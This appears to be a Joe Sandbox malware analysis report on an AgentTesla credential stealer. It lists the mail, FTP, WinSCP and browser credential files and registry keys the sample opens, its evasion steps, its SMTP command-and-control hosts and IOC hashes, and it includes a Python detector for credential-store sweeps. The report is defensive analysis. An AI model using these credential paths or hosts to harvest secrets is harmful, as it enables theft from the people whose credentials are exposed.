Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match; File source: 0.2.03SPwb995m.exe.40065a0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.03SPwb995m.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.03SPwb995m.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.03SPwb995m.exe.3fd0380.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.03SPwb995m.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.03SPwb995m.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.03SPwb995m.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.03SPwb995m.exe.3fd0380.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.03SPwb995m.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.03SPwb995m.exe.40065a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 03SPwb995m.exe PID: 1364, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: 03SPwb995m.exe PID: 5596, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\03SPwb995m.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\03SPwb995m.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\03SPwb995m.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\03SPwb995m.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match; File source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 03SPwb995m.exe PID: 5596, type: MEMORYSTR
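What makes the four signatures above a stealer pattern rather than noise is not any single file open: Firefox legitimately reads profiles.ini and Chrome reads its own Login Data all day. It is one process that is none of those applications sweeping mail, FTP, SSH and browser stores within seconds of each other. The Python below is an added example, not part of the Joe Sandbox report: it maps each accessed file or registry key to a credential-store category using exactly the paths and keys listed above, discounts accesses by the application that owns the store, and reports any process that hits two or more categories inside a time window. The access events are constructed from this section with invented timestamps; the owner-binary list and the 60 s window are assumptions, and the owner list is deliberately incomplete (IncrediMail, for instance, is not in it).

```python
import re
from typing import Dict, List, Optional, Set, Tuple

# (category, pattern over the accessed file path or registry key). The paths
# and keys are the ones this report shows the sample opening.
STORE_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("mail",    re.compile(r"\\Thunderbird\\profiles\.ini$", re.I)),
    ("mail",    re.compile(r"\\Software\\IncrediMail\\Identities$", re.I)),
    ("mail",    re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", re.I)),
    ("ssh",     re.compile(r"\\Martin Prikryl\\WinSCP 2\\Sessions$", re.I)),
    ("ftp",     re.compile(r"\\FileZilla\\recentservers\.xml$", re.I)),
    ("ftp",     re.compile(r"\\SmartFTP\\Client 2\.0\\Favorites\\", re.I)),
    ("browser", re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Cookies|Login Data)$", re.I)),
    ("browser", re.compile(r"\\Mozilla\\Firefox\\profiles\.ini$", re.I)),
]

# Assumed owner binaries that legitimately read each category (incomplete;
# populate from your own software inventory).
OWNERS: Dict[str, Set[str]] = {
    "mail": {"thunderbird.exe", "outlook.exe"},
    "ssh": {"winscp.exe"},
    "ftp": {"filezilla.exe", "smartftp.exe"},
    "browser": {"chrome.exe", "firefox.exe"},
}


def store_category(target: str) -> Optional[str]:
    """Credential-store category of a file path or registry key, or None."""
    for cat, pat in STORE_PATTERNS:
        if pat.search(target):
            return cat
    return None


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def sweep_findings(events: List[Dict], window_s: float = 60.0) -> Dict[str, List[str]]:
    """Return {process image: sorted categories} for every process that touched
    credential stores of two or more categories it does not own within window_s.

    Each event is {"ts": seconds, "image": process path, "target": file or key}.
    """
    per_proc: Dict[str, List[Tuple[float, str]]] = {}
    for ev in events:
        cat = store_category(ev["target"])
        if cat is None or basename(ev["image"]) in OWNERS.get(cat, set()):
            continue
        per_proc.setdefault(ev["image"], []).append((ev["ts"], cat))
    findings: Dict[str, List[str]] = {}
    for image, hits in per_proc.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):           # sliding window from each hit
            cats = {c for t, c in hits[i:] if t - t0 <= window_s}
            if len(cats) >= 2:
                findings[image] = sorted(cats)
                break
    return findings


MALWARE = r"C:\Users\user\Desktop\03SPwb995m.exe"

# Constructed sample: the accesses from this section (timestamps invented),
# plus three control cases that must not be reported.
SAMPLE_EVENTS = [
    {"ts": 100.0, "image": MALWARE, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"ts": 100.2, "image": MALWARE, "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"ts": 100.4, "image": MALWARE, "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                                              r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"ts": 100.9, "image": MALWARE, "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"ts": 101.3, "image": MALWARE, "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"ts": 101.5, "image": MALWARE, "target": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\"},
    {"ts": 102.0, "image": MALWARE, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": 102.1, "image": MALWARE, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    # The owning application reading its own store: never counted.
    {"ts": 103.0, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    # One category from a non-owner: noisy, but not a sweep by itself.
    {"ts": 104.0, "image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    # Two categories, but hours apart: outside the window.
    {"ts": 5000.0, "image": r"C:\Tools\backup.exe", "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"ts": 9000.0, "image": r"C:\Tools\backup.exe", "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
]

if __name__ == "__main__":
    for image, cats in sweep_findings(SAMPLE_EVENTS).items():
        print("credential-store sweep:", image, cats)
```

The window is the knob that decides how much a backup or migration tool is allowed to look like a stealer; widening it to cover hours makes backup.exe in the sample fire as well, which is the trade-off to test against your own environment before deploying a rule like this.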

Remote Access Functionality:

Yara detected AgentTesla
Source: the same Yara matches (ten unpacked PE regions, seven memory dumps and the process memory of PIDs 1364 and 5596) already listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Techniques observed in this analysis, grouped by tactic. The number after each technique is the count badge shown in the matrix cell, with its digits run together by extraction. Tactics with no observed technique (Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact) are omitted.

Execution: Windows Management Instrumentation (211); Scheduled Task/Job (1)
Persistence: Scheduled Task/Job (1)
Privilege Escalation: Scheduled Task/Job (1); Process Injection (12)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (13); Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (12)
Credential Access: OS Credential Dumping (2); Input Capture (11); Credentials in Registry (1)
Discovery: File and Directory Discovery (1); System Information Discovery (114); Query Registry (1); Security Software Discovery (311); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); Remote System Discovery (1)
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (11); Clipboard Data (1)
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)

                      Behavior Graph

Behavior Graph ID: 528805; Sample: 03SPwb995m; Start date: 25/11/2021; Architecture: WINDOWS; Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for dropped file; 8 other signatures

Process tree:

03SPwb995m.exe (node 7)
    dropped: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe (PE32)
    dropped: C:\Users\user\AppData\Local\...\tmp7B67.tmp (XML)
    dropped: C:\Users\user\AppData\...\03SPwb995m.exe.log (ASCII)
    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
    +-- 03SPwb995m.exe (node 11)
            network: 208.91.199.224:587 (from local port 49834), PUBLIC-DOMAIN-REGISTRYUS, United States
            network: us2.smtp.mailhostbox.com 208.91.199.223:587 (from local port 49833), PUBLIC-DOMAIN-REGISTRYUS, United States
            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
    +-- powershell.exe (node 15)
            +-- conhost.exe (node 19)
    +-- schtasks.exe (node 17)
            +-- conhost.exe (node 21)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      03SPwb995m.exe22%VirustotalBrowse
                      03SPwb995m.exe29%ReversingLabsByteCode-MSIL.Trojan.Taskun

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe22%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe29%ReversingLabsByteCode-MSIL.Trojan.Taskun

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.03SPwb995m.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.03SPwb995m.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://1pbBaOuWGX2iibYLF.net | 0% | Avira URL Cloud | safe
http://GwvXXB.com | 0% | Avira URL Cloud | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.223 | true | false | (none) | high

                        URLs from Memory and Binaries

Name: http://127.0.0.1:HTTP/1.1
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

Name: https://api.ipify.org%GETMozilla/5.0
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: low

Name: http://DynDns.comDynDNS
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://us2.smtp.mailhostbox.com
Source: 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921914863.0000000002F13000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: (none)
Reputation: high

Name: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://1pbBaOuWGX2iibYLF.net
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921843959.0000000002EFB000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921764899.0000000002EE5000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://GwvXXB.com
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: (none)
Reputation: high

Name: https://api.ipify.org%
Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: low

Name: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: 03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, 03SPwb995m.exe, 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.199.223 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
208.91.199.224 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true

                            General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528805
Start date: 25.11.2021
Start time: 20:02:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 03SPwb995m (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/9@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 29
• Number of non-executed functions: 2
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
20:03:32 | API Interceptor | 699x Sleep call for process: 03SPwb995m.exe modified
20:03:39 | API Interceptor | 39x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

Match: 208.91.199.223
Associated samples (all detected as malicious):
• Reconfirm The Details.doc
• MT_101_SWIFT.doc
• DOCUMENTS.exe
• TOP QUOTATION RFQ 2021.exe
• UY2021 Ta-Ho Maritime Schedule.exe
• Purchase Order.exe
• StK0hTNVyxxIPrJ.exe
• daFT5cSayV.exe
• devis.xlsx
• DHL airwaybill # 6913321715.exe
• heKD0ElTBU.exe
• ADYP_210913_100641_PAGOS_005539.xlsx
• IMG-2021-15-11-OWA001.exe
• ox4RBMSG5L.exe
• DHL 7348255142.exe
• MhjOCUlq1RbHWCt.exe
• New Order-2021-PO#0834.exe
• RFQ.exe
• TEOpHaBEtDUCKRd.exe
• PURCHASE ORDER.doc

Match: 208.91.199.224
Associated samples (all detected as malicious):
• PAGO DEL SALDO.doc
• MT_1O1_SWIFt.doc
• Reconfirm The Details.doc
• Document.exe
• MT_101_SWIFT.doc
• ORDER INQUIRY-PVP-SP-2021-58.exe
• DOC221121.exe
• TOP QUOTATION RFQ 2021.exe
• AWB Number 0004318855.DOCX.exe
• Purchase Order.exe
• ORDER INQUIRY-PVP-SP-2021-56.exe
• PRESUPUESTO.xlsx
• vYeUxRnIbLKDudo.exe
• DHL Documentos de envio originales.exe
• pVLzns64XtYkuFT.exe
• BOQ 11745692.exe
• BOQ 11745692.exe
• ADYP_210913_100641_PAGOS_005539.xlsx
• gHs6ECUllmPgK2I.exe
• RFQ.exe

                                                                                                            Domains

Match: us2.smtp.mailhostbox.com
Associated samples (all detected as malicious), with the IP the domain resolved to in that analysis:
• nxHHI8WXqt.exe (208.91.198.143)
• PAGO DEL SALDO.doc (208.91.198.143)
• MT_1O1_SWIFt.doc (208.91.199.224)
• Reconfirm The Details.doc (208.91.199.224)
• Document.exe (208.91.198.143)
• MT_101_SWIFT.doc (208.91.199.225)
• ORDER INQUIRY-PVP-SP-2021-58.exe (208.91.199.224)
• DOC221121.exe (208.91.199.224)
• Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exe (208.91.199.225)
• Swift_HSBC_0099087645PDF.exe (208.91.199.225)
• P0_636732672772_RFQ.exe (208.91.199.225)
• rTyPU1zmY5PsyNl.exe (208.91.199.223)
• DOCUMENTS.exe (208.91.199.223)
• Purchase Order PO#7701.exe (208.91.198.143)
• STATEMENT OF ACCOUNT.xlsx (208.91.199.225)
• XsFFv27rls.exe (208.91.199.225)
• TransactionSummary_22-11-2021.exe (208.91.199.225)
• TNT E-Invoice No 11073490.exe (208.91.198.143)
• E invoice.exe (208.91.198.143)
• TOP QUOTATION RFQ 2021.exe (208.91.199.223)

                                                                                                            ASN

Match: PUBLIC-DOMAIN-REGISTRYUS
Associated samples (all detected as malicious), with the IP contacted in that analysis:
• nxHHI8WXqt.exe (208.91.198.143)
• PAGO DEL SALDO.doc (208.91.199.224)
• MT_1O1_SWIFt.doc (208.91.199.224)
• Reconfirm The Details.doc (208.91.199.224)
• Document.exe (208.91.199.224)
• Swift Copy TT.doc (207.174.212.140)
• MT_101_SWIFT.doc (208.91.199.224)
• ORDER INQUIRY-PVP-SP-2021-58.exe (208.91.199.224)
• DOC221121.exe (208.91.199.224)
• Swift_HSBC_0099087645PDF.exe (208.91.199.225)
• P0_636732672772_RFQ.exe (208.91.199.225)
• DOCUMENTS.exe (208.91.199.223)
• Activation Online Mail.htm (103.50.163.110)
• Purchase Order PO#7701.exe (208.91.198.143)
• STATEMENT OF ACCOUNT.xlsx (208.91.199.225)
• XsFFv27rls.exe (208.91.199.225)
• TNT E-Invoice No 11073490.exe (208.91.199.225)
• SWIFT COPY.exe (199.79.62.99)
• E invoice.exe (208.91.199.225)
• TOP QUOTATION RFQ 2021.exe (208.91.199.224)

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

Match: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
Associated samples (detected as malicious):
• Reconfirm The Details.doc

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03SPwb995m.exe.log
Process: C:\Users\user\Desktop\03SPwb995m.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1310
Entropy (8bit): 5.345651901398759
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5: D918C6A765EDB90D2A227FE23A3FEC98
SHA1: 8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256: AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512: A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):22368
                                                                                                              Entropy (8bit):5.601708622549626
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:2tCDtCeeXImY3nQUp+ncSBKn0jultIi/7Y9gxSJ3xST1MaDZlbAV7AriyZBDI+B0:W2mVUCc4K0Cltd7xcgCSfw8rVc
                                                                                                              MD5:4B4C0891EA65539D96F45DFE5033D622
                                                                                                              SHA1:4C68C339CAB34F2D6A7B748C7AF5C7003C644182
                                                                                                              SHA-256:15A1BE3CD4E18B9774AA7DFA6CF97696FF47C275BFB4D51A68D151F59F4848C0
                                                                                                              SHA-512:2FA4E20231B74AD677466A713CEF40AAFC0DFEEFA33A5F44F59344A5B5E73FE222EB3B36A3777035496E142DA61BEFF73D075DC28D9BD04B581AAC794BF8BD0D
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: @...e...................h.".E.8.5.........I..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ks33pk2.inw.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frun4r5c.vwu.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1596
                                                                                                              Entropy (8bit):5.148940738524574
                                                                                                              Encrypted:false
